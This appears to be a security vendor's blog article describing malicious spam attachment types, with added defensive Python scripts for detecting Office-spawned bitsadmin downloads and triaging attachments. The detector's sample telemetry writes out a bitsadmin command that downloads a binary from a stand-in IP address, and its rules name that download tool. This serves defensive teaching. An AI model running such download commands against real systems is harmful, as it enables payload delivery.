The Most Dangerous Attachments in Spam Emails

Despite the many more advanced attack techniques available, threat actors still use spam emails to initiate attacks, and the threat has grown far more sophisticated than it was in the heyday of Nigerian prince scams.

Cybercriminals send billions of messages every day, most of them mundane advertising. Though annoying, these are generally harmless. But once in a while, a message arrives with a malicious file attachment.

It’s usually disguised as something valuable, interesting, or urgent: a great offer, an office document, a gift card linked to a famous brand, and so on. Malware distributors also favour particular file formats. This explains the recent spike in email scams that prompted the government to issue a notice and share tips.

Understanding the most dangerous spam email attachments and spotting the red flags can protect you from a devastating cyberattack, financial loss, and reputational damage.

This guide explores the most dangerous attachments in spam emails today and how to react when facing a threat.

Which Are the Most Dangerous Attachments in Spam Emails?

Dangerous spam email attachments come in different forms, but these are the most hazardous and the hardest to deal with:

Compressed Files

Compressed archives are among the hardest malicious attachments to identify and block, because there is a legitimate reason to share one by email: reducing the attachment’s size. The problem with this file type is that the archive hides its contents, which may include hazardous .exe files and other kinds of malware.

Avoid opening attachments with .rar, .zip, .arc, or .r09 extensions unless you’re confident that the sender has a legitimate reason for sharing a compressed file.

When sharing large files with a colleague, consider a file-sharing service such as WeTransfer or Dropbox instead of an email attachment. Such messages are less likely to be flagged by security software.

DOC/XLSM Files Delivering Trickbot

There has been a substantial spike in tax-themed spam campaigns in which cybercriminals use XLSM and DOC files to deliver Trickbot, a modular banking Trojan. The emails purported to contain tax-billing documents and carried Office attachments with a malicious macro.

The macro downloads and executes the payload via BitsAdmin, a legitimate Windows command-line tool for creating download or upload jobs and monitoring their progress. Once the payload runs, Trickbot begins deploying its modules on your device and stealing as much sensitive data as it can.
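One way a defender can spot the behaviour just described in endpoint telemetry is to alert when an Office application is the parent process of bitsadmin.exe, and to note separately when a BitsAdmin job fetches from a remote URL. The script below is an added example, not code from the article: the event dictionaries are constructed sample telemetry whose field names loosely follow Sysmon process-creation events, and the rule names are my own.

```python
import re

# Added example (not from the article): flag process-creation events in which
# an Office application launches bitsadmin.exe, the behaviour the article
# attributes to macro-laden DOC/XLSM attachments that fetch Trickbot.

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# bitsadmin switches that create or populate a transfer job (documented bitsadmin verbs).
TRANSFER_VERBS = ("/transfer", "/addfile", "/create")
URL_RE = re.compile(r"https?://", re.IGNORECASE)

# Constructed sample telemetry; field names loosely follow Sysmon Event ID 1 (process create).
# Event 1 models the article's scenario, event 2 a routine admin query, and event 3 a remote
# download started from Explorer, which is worth a look but is not the Office-spawned pattern.
SAMPLE_EVENTS = [
    {"id": 1,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer upd /download http://198.51.100.7/x.bin C:\Users\Public\x.bin"},
    {"id": 2,
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /list /allusers"},
    {"id": 3,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer tools /download http://intranet.example.invalid/agent.msi C:\Temp\agent.msi"},
]


def basename(path):
    """Lower-cased final path component, accepting either separator."""
    return re.split(r"[\\/]", path)[-1].lower()


def evaluate(event):
    """Return the list of rule names that fire for one process-creation event."""
    reasons = []
    if basename(event["Image"]) != "bitsadmin.exe":
        return reasons
    parent = basename(event["ParentImage"])
    cmd = event["CommandLine"].lower()
    # High-confidence rule: Office applications have no business launching BitsAdmin.
    if parent in OFFICE_APPS:
        reasons.append(f"office-parent: bitsadmin.exe launched by {parent}")
    # Lower-confidence rule: a transfer job that pulls content from a URL.
    if any(verb in cmd for verb in TRANSFER_VERBS) and URL_RE.search(cmd):
        reasons.append("remote-transfer: bitsadmin job fetching from a URL")
    return reasons


def triage(events):
    """Map event id -> reasons for every event that trips at least one rule."""
    hits = {}
    for event in events:
        reasons = evaluate(event)
        if reasons:
            hits[event["id"]] = reasons
    return hits


if __name__ == "__main__":
    for event_id, reasons in triage(SAMPLE_EVENTS).items():
        print(event_id, reasons)
```

The office-parent rule is the one worth paging on; the remote-transfer rule on its own will also catch legitimate software deployment, so in practice it is better used as context or an allow-listed lower-severity signal.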

First reported in 2016, Trickbot has evolved quickly and now includes advanced code-injection techniques, updated data-stealing modules, and a custom redirection approach.

Microsoft Office Files

Microsoft Office documents, especially Excel spreadsheets (XLSM, XLSX, and XLS), Word documents (DOCX, DOC), templates, and presentations, are among the most dangerous spam email attachments. Fraudsters embed macros in these files – small programs that live inside the Office file – and use them as scripts to download malware.

Typically, these attachments target office staff and are disguised as urgent messages, invoices, contracts, or tax notifications from senior management or government bodies. For instance, Ursnif, a banking Trojan, was sent to users in Italy disguised as a payment notice. Anyone who downloaded and opened the document and then enabled macros (which are disabled by default for security reasons) ended up with a Trojan on their device. Verifying the sender of the file can keep you from falling victim.

PDF Files

Most people understand the risk of macros in Word documents, but fewer are aware of the equally dangerous booby traps in PDF files. Malware can be delivered and launched through a PDF, and spammers also use the format to embed and run JavaScript, or to hide phishing links inside the document.

For instance, in one campaign, scammers tricked users into clicking through to a “secure” page where they were prompted to enter the login details for their American Express accounts. Instead, the details went straight to the spammers.

Dangerous Installers

Windows uses the MSI package format to install programs, but cybercriminals can use the same mechanism to deploy malware on your computer. The safest course is to delete any email with an .msi attachment. On a Mac, software is commonly distributed as .dmg disk images, so be equally wary of attachments in that format.

IMG and ISO Disk Images

Compared with the other spam email attachments, IMG and ISO files are the least commonly used, but cybercriminals are paying closer attention to them. In essence, a disk image is a virtual copy of a DVD, CD, or other disk.

Fraudsters use them to deliver malware onto victims’ computers. One example is the Agent Tesla Trojan, which actively steals user credentials: the image contains a malicious executable that, once the image is mounted, runs and installs spyware on the computer. Notably, the threat actors sent ISO and DOC attachments together, most likely as a fail-safe.

How to Handle Potentially Dangerous Attachments

It’s impractical to bin every message that falls into the categories above. Instead of that overkill, you can outfox spammers by paying attention to the following simple tips:

  • Never open a suspicious email from an unfamiliar sender. If you can’t explain why a particular email ended up in your inbox, you probably don’t need the message.
  • If you mostly deal with correspondence from unfamiliar senders, always review the sender’s address carefully and check the attachment name. Don’t open it if you see any red flag, inconsistency, or anything odd.
  • Disable macros in documents received by email. Only allow them when you have to.
  • Treat every link within a file attachment with caution. If there’s no reason to click on a link, just ignore it. If you believe you have to follow a link, type the relevant website’s address into your browser manually instead.
  • Install a reliable cybersecurity solution that will alert you to dangerous attachments and block the threat. Your tool should also warn you if you attempt to load a suspicious website.
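The checks in the tips above (attachment type, attachment name, what an archive actually contains, whether a document carries macros) can be automated for mail that lands in a triage mailbox. The Python script below is an added example and not part of the original article: it parses a raw message with the standard library, looks for the extensions the article lists, flags double extensions, checks that the content matches the claimed type, opens ZIP attachments one level down, and reports a vbaProject.bin member inside an Office Open XML file as a macro. The sample message, its addresses, and the byte stubs inside it are all constructed for the example.

```python
import email
import io
import zipfile
from email import policy
from email.message import EmailMessage
from pathlib import PurePosixPath

# Attachment types the article singles out as common malware carriers
# (a constructed policy table for this example, not an exhaustive list).
RISKY_EXT = {
    ".exe", ".msi", ".dmg", ".iso", ".img",      # executables, installers, disk images
    ".zip", ".rar", ".arc", ".r09",              # compressed archives
    ".doc", ".xls", ".docm", ".xlsm", ".pptm",   # Office formats that can carry macros
}
ARCHIVES_TO_OPEN = {".zip"}     # only ZIP is expanded here; RAR/ARC need extra libraries
MAX_MEMBER_BYTES = 5_000_000    # refuse to inflate oversized members (zip-bomb guard)
MAX_DEPTH = 2                   # archives nested inside archives are a red flag in themselves

# Leading bytes used to check that the content matches what the filename claims.
MAGIC = {b"MZ": "windows-executable", b"%PDF": "pdf", b"PK\x03\x04": "zip-container"}


def sniff(data):
    """Return a coarse content type from the first bytes, or 'unknown'."""
    for magic, label in MAGIC.items():
        if data.startswith(magic):
            return label
    return "unknown"


def assess_blob(name, data, depth=0):
    """Return human-readable findings for one attachment, recursing into ZIP archives."""
    findings = []
    suffixes = [s.lower() for s in PurePosixPath(name).suffixes]
    ext = suffixes[-1] if suffixes else ""
    if len(suffixes) > 1:
        findings.append(f"{name}: double extension {''.join(suffixes)}")
    if ext in RISKY_EXT:
        findings.append(f"{name}: risky attachment type {ext}")
    kind = sniff(data)
    if kind == "windows-executable" and ext not in {".exe", ".dll", ".msi"}:
        findings.append(f"{name}: content is a Windows executable despite the {ext or 'missing'} extension")
    if kind == "zip-container":
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                members = zf.infolist()
                # Office Open XML files are ZIPs; a vbaProject.bin member means a macro is present.
                if any(m.filename.lower().endswith("vbaproject.bin") for m in members):
                    findings.append(f"{name}: Office document contains a VBA macro project")
                if ext in ARCHIVES_TO_OPEN:
                    if depth >= MAX_DEPTH:
                        findings.append(f"{name}: archive nested {MAX_DEPTH} levels deep, not expanded")
                    for m in members:
                        if depth < MAX_DEPTH and not m.is_dir() and m.file_size <= MAX_MEMBER_BYTES:
                            findings.extend(assess_blob(f"{name}/{m.filename}", zf.read(m), depth + 1))
        except zipfile.BadZipFile:
            findings.append(f"{name}: claims to be a ZIP but cannot be parsed")
    return findings


def assess_message(raw):
    """Parse a raw RFC 5322 message and assess every attachment part."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or "unnamed-attachment"
        findings.extend(assess_blob(name, part.get_payload(decode=True) or b""))
    return findings


def build_sample():
    """Constructed sample: a tax-themed message carrying a ZIP that hides a
    double-extension executable stub and a macro-enabled Word container.
    Every payload byte is an inert stub."""
    archive = io.BytesIO()
    with zipfile.ZipFile(archive, "w") as zf:
        zf.writestr("invoice.pdf.exe", b"MZ" + b"\x00" * 62)
    docm = io.BytesIO()
    with zipfile.ZipFile(docm, "w") as zf:
        zf.writestr("[Content_Types].xml", b"<Types/>")
        zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0")
    msg = EmailMessage()
    msg["From"] = "billing@example.invalid"
    msg["To"] = "staff@example.invalid"
    msg["Subject"] = "Tax bill attached"
    msg.set_content("Please review the attached documents.")
    msg.add_attachment(archive.getvalue(), maintype="application", subtype="zip",
                       filename="tax_docs.zip")
    msg.add_attachment(docm.getvalue(), maintype="application",
                       subtype="vnd.ms-word.document.macroEnabled.12", filename="form.docm")
    return msg.as_bytes()


if __name__ == "__main__":
    for line in assess_message(build_sample()):
        print(line)
```

A few limits worth knowing: .rar and .arc attachments are flagged by name only, because expanding them needs third-party libraries; legacy .doc and .xls files are flagged by extension because their macros live in an OLE container this script does not parse; and a version-style name such as setup.1.2.exe will also be reported as a double extension, which is acceptable for triage but should not be mistaken for proof of deception.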

Notably, opening a spam email by itself isn’t dangerous, provided you don’t open an attachment or click on a link. It is clicking links in the message body and downloading attachments that exposes users to phishing, ransomware, and other malware.

The above tips will help you stay safe, but you can only be confident of optimal security if you partner with an experienced cybersecurity expert in your location. Speak with us to learn why you should work with experts and for apt guidance on the correct remediation steps. What’s more, you can schedule a free threat assessment for you or your organization.